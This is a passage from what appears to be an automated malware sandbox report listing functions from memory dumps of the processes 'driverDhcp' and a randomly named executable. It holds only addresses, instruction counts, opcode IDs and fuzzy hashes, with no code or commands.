Instruction ID: e5def47bac5316d660e862dc5fd9af5762cf35d32ec20cf9cdfc46f1c7744ebd
Opcode Fuzzy Hash: 76189bca634e2dd577b9bca62c54504a4c70ba370054d438b67234b1638ee9cf
Instruction Fuzzy Hash: 37A16A3091DA8A8FDB85EF6488196FA7BF0FF19340F0505BBE809C3192EB38A594C755

Function 00007FF848F3ADFA Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 807d2e20580ca3ac9b4d94e72f7642dee2baff45ced9601669c9450ccf664f30
Instruction ID: e6d500d6c83b76f8053f409a7ad40192f2ea98cfdd64bdf74c6d2fe971cb9f19
Opcode Fuzzy Hash: 807d2e20580ca3ac9b4d94e72f7642dee2baff45ced9601669c9450ccf664f30
Instruction Fuzzy Hash: 04A1B971D0DA8A8FE755BB6988585EE7BE0FF55380F0444BBD408C71D2EB28A9848B45

Function 00007FF848F31728 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f55d58cdf06f7726e15a1f2ef180ac59fd365b43b161b0a2e743a8c99b330c2
Instruction ID: bbe8386a544050dc98ded8059b225c7000a09a9745e36e26f62071a9fb89b206
Opcode Fuzzy Hash: 4f55d58cdf06f7726e15a1f2ef180ac59fd365b43b161b0a2e743a8c99b330c2
Instruction Fuzzy Hash: 6081AC31A0CA498FDB48EF2898556A977E2FF99754F14067AE44EC32C6CF24AC42C784

Function 00007FF848F305F0 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca080a9b1dbacfc5fc6cf930c61b6048efb56e8bd58157a16ec72d3128670ae
Instruction ID: ac6c7f41d3c7a180d45b662c822b51671f2236b4392249c6111ce3bc30e729e1
Opcode Fuzzy Hash: 0ca080a9b1dbacfc5fc6cf930c61b6048efb56e8bd58157a16ec72d3128670ae
Instruction Fuzzy Hash: F1819E30A1CA4A8FDB48EF2888555BA77E1FF99354F14457FE40AC7282DF35A892C784

Function 00007FF848F3A428 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 887e1bf033e0bcc5eac2c624696aa2c27a90fdc6195fd58673c88a1775ffd635
Instruction ID: 75829d92090d11b61a33d2de623ea566a688468ace1fbfb0c56006643c533834
Opcode Fuzzy Hash: 887e1bf033e0bcc5eac2c624696aa2c27a90fdc6195fd58673c88a1775ffd635
Instruction Fuzzy Hash: CA916A3091DA8A8FEB95EF2488596F97BF0FF19351F0505BBE808C3192EB38A594C745

Function 00007FF848F3ABDD Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f48b42ad644ff920121cb31e6e1a18d98e837460dba5ca32b59a9cd403c4cbaa
Instruction ID: d0ae8e847a3f2cd021aee10f95b731960c6006d3eddd993d4b5531a3ae3d14d7
Opcode Fuzzy Hash: f48b42ad644ff920121cb31e6e1a18d98e837460dba5ca32b59a9cd403c4cbaa
Instruction Fuzzy Hash: BB816A3090D68E8FEB95EF24C8596FA7BB0FF69341F0005BBE809D6192DB38A5548781

Function 00007FF848F305D0 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8dac7c7efb7252b4f797c326daf8b6bcaad92f3d45644bfbaac342dd938415c
Instruction ID: ebf97c0510354c3ee44e14d497eed9e156061545d7aa9d423079aa847348c3b1
Opcode Fuzzy Hash: d8dac7c7efb7252b4f797c326daf8b6bcaad92f3d45644bfbaac342dd938415c
Instruction Fuzzy Hash: 8661CF31A0CA4A8FDB48EF2888555BA77E2FF99354F14457FE40AC7281CF35A882C784

Function 00007FF848F32A80 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d808276bdd9d55ee0815121a2d8e93338040eb40ba30721453a9a5b47bae1f82
Instruction ID: 4ff9b9a67f6ad2f9b7bb8f80d7f734c0ca2981cabf61bea27fb3c6a06e91846e
Opcode Fuzzy Hash: d808276bdd9d55ee0815121a2d8e93338040eb40ba30721453a9a5b47bae1f82
Instruction Fuzzy Hash: 23819C3090DA4E8FEB95FB2884586F97BE0FF29751F1408BBD409D61D2EB38A444C745

Function 00007FF848F3A4A8 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edf793e837569e3c364f6f93319d2c01d7c3e633dd3b51ec1faeccf392b3fa1e
Instruction ID: 2c5e63ab56de3c387be5ca266fe6bcf264cb4d6a66367427f0288e9560f63c53
Opcode Fuzzy Hash: edf793e837569e3c364f6f93319d2c01d7c3e633dd3b51ec1faeccf392b3fa1e
Instruction Fuzzy Hash: 4D716A3091DA8A8FDB86EF6488596F97BF0FF19341F0501BBE808C3192EB38A954C755

Function 00007FF848F3AB9D Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31dd2a663f3019ab44daa86954036db4684c9e9d52a254f202041b2c7e3cb1c9
Instruction ID: c074204ccc543e3608fd253e402de66488323b9863d01fd0fcdad8dbaf190c2c
Opcode Fuzzy Hash: 31dd2a663f3019ab44daa86954036db4684c9e9d52a254f202041b2c7e3cb1c9
Instruction Fuzzy Hash: 7D71893090D64E8FEB95EB24C8596BA7BB1FF69301F0005BBD80AD7192DB39A954CB41

Function 00007FF848F32A20 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 763038e1181acf1187c83b1a69b9f1d22061c9345121cb0446c0b85c297fa75c
Instruction ID: d7cb0a4ee97e540825261d41afe9017f949701a1d06139385cfd80c3517854ab
Opcode Fuzzy Hash: 763038e1181acf1187c83b1a69b9f1d22061c9345121cb0446c0b85c297fa75c
Instruction Fuzzy Hash: 8A61E63191EA8E8FE791BB7898142FA3BB0EF16765F0405BBD448D60D3EF2C64488759

Function 00007FF848F46090 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0326c4d9797e7f5a2ff634cad84f8b92bc74d92a6b0c0d9962d0272ee322fcdf
Instruction ID: 16a9bcc8bbaad78608e5dcc1ea7e0293cc83e0961aa7cbd5cd6c6c1b4463dad6
Opcode Fuzzy Hash: 0326c4d9797e7f5a2ff634cad84f8b92bc74d92a6b0c0d9962d0272ee322fcdf
Instruction Fuzzy Hash: D3715A70D0D64A8EFBA5AB6488593BDBBB0FF65740F0041BBD409E22D2DF3C69848B45

Function 00007FF848F33100 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70e77c26f0b9a722a2036c3aba410fc23a230942b3be4451de956e5b9d664484
Instruction ID: 7a41625d999e72c0381f7423ee2562e54d8db041007c895497638006b5bf3794
Opcode Fuzzy Hash: 70e77c26f0b9a722a2036c3aba410fc23a230942b3be4451de956e5b9d664484
Instruction Fuzzy Hash: 34516A31D1D68A8FEB52FB68E8592FABBB0EF05351F04057BD408D61D2EB38A548CB15

Function 00007FF848F31DC8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fc67541100d18745b37ee0d85ae990117f7ec4662c8708de970abd946fb5fac
Instruction ID: ea4cbe8de8edc151189334cdd40e376c3f9dd097bae3f9ef7851745658a23c26
Opcode Fuzzy Hash: 0fc67541100d18745b37ee0d85ae990117f7ec4662c8708de970abd946fb5fac
Instruction Fuzzy Hash: D3417D31A18A598FDB48EF1888555BAB3E2FB98755F10463EE45EC3285CF31A852CB84

Function 00007FF848F32E59 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65e7b1257befdab22a9675f1f780757244287b3aa82d86ab5c449b5b52b1b1c8
Instruction ID: 90eff4f97dcab5d5bb81c1edbe9908ead3625d74837c609c753060ba0a9dfbe7
Opcode Fuzzy Hash: 65e7b1257befdab22a9675f1f780757244287b3aa82d86ab5c449b5b52b1b1c8
Instruction Fuzzy Hash: 6C519C71D1D28A8FEB52ABB488592FA7BE0EF15341F0409BBD408C61D2EB78A548CB55

Function 00007FF848F328AD Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9142ae6dee9751a297d09e30516a26e79cabc45e36e33bc24059df06b560f17
Instruction ID: a2f7ff23aa77309f20f49111a3bd81cc7f0596ab6a621c16b34e519e9c5100dd
Opcode Fuzzy Hash: d9142ae6dee9751a297d09e30516a26e79cabc45e36e33bc24059df06b560f17
Instruction Fuzzy Hash: 2A41B43661A25A8FD741BB78E8855E97BB0EF42366F0887B3C088CE093DE2C60498755

Function 00007FF848F32EE8 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdaa111ed7c6d519967cdd633da9651fbfab3938b455860223d3ec4f01170ea7
Instruction ID: 89ddda6db0cb6cdaebfb66c715ad9a1ec44d1e8d6e7012dc0dc9a5784568e8d3
Opcode Fuzzy Hash: bdaa111ed7c6d519967cdd633da9651fbfab3938b455860223d3ec4f01170ea7
Instruction Fuzzy Hash: 8041AC71D0D28A8FEB51BBB488182FA7BE0EF05386F040577D808D61D6EB78A648CB45

Function 00007FF848F337BA Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5f382fc15a0708a015fbe533cb3b08e6c5964517796ae84037c5456566d6e39
Instruction ID: 1dd3735daa45c8ba3f43dcf7b386e5d957791d2516a91cb1743a115560c1ee67
Opcode Fuzzy Hash: b5f382fc15a0708a015fbe533cb3b08e6c5964517796ae84037c5456566d6e39
Instruction Fuzzy Hash: BD31D071A0DA0E8FE749EF68D8053A97BF1FB963A4F50017AC009D72C6DBBA14558B50

Function 00007FF848F326DD Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51ab68288314dc311b138178d7a6c764cf173863025de379ac004700b13597bd
Instruction ID: d1dbbb7a5e6c625a0b96c87abec43fee85aeb5e22b35d7666fe9fca895be38a0
Opcode Fuzzy Hash: 51ab68288314dc311b138178d7a6c764cf173863025de379ac004700b13597bd
Instruction Fuzzy Hash: 85315E3180D7CE8FDB56AB7488582A97FA0FF16341F0944BBD848C61D2EB38A558C751

Function 00007FF848F30500 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdd98e36423486463a0eeae269536b9215ad4ba19545f1966ce3a8b2f1a5aa52
Instruction ID: 0f90da395fcf8b7e19cc0e48d0921b8a7a0fec66f78c9af588fd1d4459a9dd50
Opcode Fuzzy Hash: bdd98e36423486463a0eeae269536b9215ad4ba19545f1966ce3a8b2f1a5aa52
Instruction Fuzzy Hash: 4A419E3081D78E8FEB56EB7488586A97BE0FF19342F0544BBD408C61E2EB38A454C751

Function 00007FF848F3ADB5 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02348842bd1c0cd1e1e9cf47cd0874c598c82eeebc3fe8a7524cceb720d96c2b
Instruction ID: cafd09433f4b56be40fb28ca0722dc4c98af5b39bdc6a1050c88c52c68b7fa70
Opcode Fuzzy Hash: 02348842bd1c0cd1e1e9cf47cd0874c598c82eeebc3fe8a7524cceb720d96c2b
Instruction Fuzzy Hash: 7641587090D64A8FEB56EB6488182FA7BB0FF09340F0005BBD409D72D2EB38AA54CB55

Function 00007FF848F32F59 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbbefd8787b909871338e04a63a16b50351863f635793a30acc1030fdde12fe8
Instruction ID: 307f59f2c7f6e8bf30c0ea48770eb7ac892d95a00a29e33b68d1db794fa667f2
Opcode Fuzzy Hash: cbbefd8787b909871338e04a63a16b50351863f635793a30acc1030fdde12fe8
Instruction Fuzzy Hash: 8C31AC71D0C24A8FEB51ABB889082FEBBE0EF14386F040577D805D61C5EB78A6488B85

Function 00007FF848F304F8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 407f6c55a2d8efabc5f08025f89a8aff6a8751adb105c64b4115ff4570a789aa
Instruction ID: 08525587ca961580562273b7b8898bd76b03f9c4ddb77196bd5f1d9234749d02
Opcode Fuzzy Hash: 407f6c55a2d8efabc5f08025f89a8aff6a8751adb105c64b4115ff4570a789aa
Instruction Fuzzy Hash: C9219D3091D78E9FEB56FB6888582B97BE0FF19342F0444BBE809C61D2EB38A444C711

Function 00007FF848F30A01 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e4fba660814552f75bc119b59c802014bcf5d912667776fd1eac607b0e7b3c4
Instruction ID: 0347454fdfe193df7f2d36dd4420ccff66f70d6b8f12b265cad5a10cf83043cd
Opcode Fuzzy Hash: 6e4fba660814552f75bc119b59c802014bcf5d912667776fd1eac607b0e7b3c4
Instruction Fuzzy Hash: 51116A31D0994E9FEB80FB68D8492BDBBE0FF98390F4405B7D809C6192EF38A5448740

Function 00007FF848F32768 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 065299d151ad7560e1fd8c0f1cb9b7fdd59e7019c8ed6e9428e5ae3c1648dd11
Instruction ID: dcf8557bbf249c072a221989b99989990e92dd38fd8e1b723940bae5fb141568
Opcode Fuzzy Hash: 065299d151ad7560e1fd8c0f1cb9b7fdd59e7019c8ed6e9428e5ae3c1648dd11
Instruction Fuzzy Hash: 1411637181D78E8FEB56AF7488592B93FA0FF15342F4404BBD809C61D2EB78A554C741

Function 00007FF848F305D8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e3743fea279e5f8a7e6877914e8e2d7d0b8028e6491951cbe47606bd8b4c22e
Instruction ID: 6e4112f74bfe0fe085ba7277053a6589fef12a3fd90910e91035d789b0d7ac08
Opcode Fuzzy Hash: 8e3743fea279e5f8a7e6877914e8e2d7d0b8028e6491951cbe47606bd8b4c22e
Instruction Fuzzy Hash: 3C11B83080C64E8FDB89EF2484696BA7BA1FF1A340F5044BFE40AC71D2DB35A595CB04

Function 00007FF848F30608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc6ccb775f1a50dff61d4dea7f733122549fd5ab5331401b296e12ecb3db22d5
Instruction ID: bf4b8cec1a40ce78edc248b20d3152e0bcfba0cdf9650b4dd8725ca442aaf2a7
Opcode Fuzzy Hash: cc6ccb775f1a50dff61d4dea7f733122549fd5ab5331401b296e12ecb3db22d5
Instruction Fuzzy Hash: E3016930919A0E9EEB59EB6484592B9B6A0FF18346F20487FE40EC21D1DF39A590C654

Function 00007FF848F30610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37887c8b8d852329328f099432cd4a70b4e87ee6b0376e117d1c2da4bcb2c53e
Instruction ID: 08f55e9478961bf8c798b7acfd259fdaeaa003ada9048e7e8b51fcde6fd1c720
Opcode Fuzzy Hash: 37887c8b8d852329328f099432cd4a70b4e87ee6b0376e117d1c2da4bcb2c53e
Instruction Fuzzy Hash: F5016930859A0E9EEB48FBA480582BDB7A0FF18346F20087FE80EC21D5DF35A550C604

Function 00007FF848F3283D Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e31a2a022b64f05a770ff819d2a4af7d2aff609014206effd0bf3f9c2e939080
Instruction ID: 31e55297d98c422250a17f52de60773e77a9eda9e363d71ca2d5e6efbc6c4534
Opcode Fuzzy Hash: e31a2a022b64f05a770ff819d2a4af7d2aff609014206effd0bf3f9c2e939080
Instruction Fuzzy Hash: 69F09A3084E78E8FEB59AF6484592B93BA0FF15342F5104BBE809C21E2EB399454C640

Function 00007FF848F327D8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e2c9310eb65c0d2e77e97e194bf86ec611b6052f279fb3d68792187e53d49c9
Instruction ID: ef2e02b6187d38bca099a024b999b477ace6df2f2bf03af4430515a77d491cc1
Opcode Fuzzy Hash: 0e2c9310eb65c0d2e77e97e194bf86ec611b6052f279fb3d68792187e53d49c9
Instruction Fuzzy Hash: B4F0A03081E74E9EEB69AF7484192F97AA0FF44342F10097FE81AC21C5DF39A4A4C681

Function 00007FF848F37114 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c54322cd1f5ee285431a6f06731c08771517aec14a5a0612f894af7c2eb42333
Instruction ID: b4d83427e24b41e9ace9e6985195162bf1038ca6a137f239f24ab771b24820a2
Opcode Fuzzy Hash: c54322cd1f5ee285431a6f06731c08771517aec14a5a0612f894af7c2eb42333
Instruction Fuzzy Hash: 21F01FB0E1992D9EDBE9EF188854BE8B6B1EB58341F5040EE910DE3691CF305AC09F58

Function 00007FF848F30F8F Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cd70e397d3f22e794143ef1604d19e8c25da05bb9ed4050dca8df63453c4037
Instruction ID: 4bb1bcf2a40a8b62d50e5106fc3d7b29dcaefd60c64f7a6bf98d4110b758e7a3
Opcode Fuzzy Hash: 9cd70e397d3f22e794143ef1604d19e8c25da05bb9ed4050dca8df63453c4037
Instruction Fuzzy Hash: 2BE0EC30D1A41D8FEB90FB14CC91BAEAAB1EF44344F5041B6D00DA32C1DF3869844B98

Analysis Process: uVyodHPItdaFNnFIblVMLhppqvOTKO.exePID: 1996, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F03448 Relevance: 1.6, Strings: 1, Instructions: 363COMMON

Download Yara Rule

Strings

O_H, xrefs: 00007FF848F0375D

Memory Dump Source

Source File: 00000015.00000002.4468698433.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848f00000_uVyodHPItdaFNnFIblVMLhppqvOTKO.jbxd

Similarity

API ID:
String ID: O_H
API String ID: 0-364725170
Opcode ID: 5632c15dccaa0eb633519a2da4653b94489c8bf9958901b5da0536e81ae9e601
Instruction ID: 351b4603e32eedf8dfa76ce233b46bd2e183a9f4b4a08e21a47ff91ce9a156d5
Opcode Fuzzy Hash: 5632c15dccaa0eb633519a2da4653b94489c8bf9958901b5da0536e81ae9e601
Instruction Fuzzy Hash: 69C1A170D1DA8A8FEB95EB28C8596B9BBF0FF5A340F4404BAD009C72D2EB386545C715

Function 00007FF848F02BD0 Relevance: 1.0, Instructions: 954COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.4468698433.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848f00000_uVyodHPItdaFNnFIblVMLhppqvOTKO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6efbf83f6a95874e3a5b9d5b177a2d81c024f47fb1b541951a110163eec9ac13
Instruction ID: e2dc2439a85c1290d740409807bccffbabf797495ad3cc22eef5b54a515c9cc9
Opcode Fuzzy Hash: 6efbf83f6a95874e3a5b9d5b177a2d81c024f47fb1b541951a110163eec9ac13
Instruction Fuzzy Hash: F5627A3090D68E8FDB85EF28C8596BA7BF0FF1A341F0545BAD409C71A2EB35A584CB51

Function 00007FF848F09D60 Relevance: .9, Instructions: 870COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.4468698433.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848f00000_uVyodHPItdaFNnFIblVMLhppqvOTKO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 692feab946ccaf82a07ff9d88e851360787b615d91aa285a063bd5671bf8b6fd
Instruction ID: 26c3b7f578838ca52d3d661c91d432cfe452e681d7f9215d90118b0ba2fb298f
Opcode Fuzzy Hash: 692feab946ccaf82a07ff9d88e851360787b615d91aa285a063bd5671bf8b6fd
Instruction Fuzzy Hash: 5B529F3090D78A8FDB96EF2488596E97FF0FF16301F0505BAE849C71A2EB38A954C751

Function 00007FF848F09F38 Relevance: .7, Instructions: 668COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.4468698433.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff848f00000_uVyodHPItdaFNnFIblVMLhppqvOTKO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08399f500318c0585bc7330b4f0f8fd33c9679bc87e310ef6c730b14c81c46f9
Instruction ID: e84008df68af504132743b2aa6f081316c7c9292094606684c2e7baa70428cbe
Opcode Fuzzy Hash: 08399f500318c0585bc7330b4f0f8fd33c9679bc87e310ef6c730b14c81c46f9
Instruction Fuzzy Hash: 03326F3091D68E8FDB95EF2888596F97BF0FF16341F0505BAE809C71A2EB38A594C741

Function 00007FF848F2DC28 Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

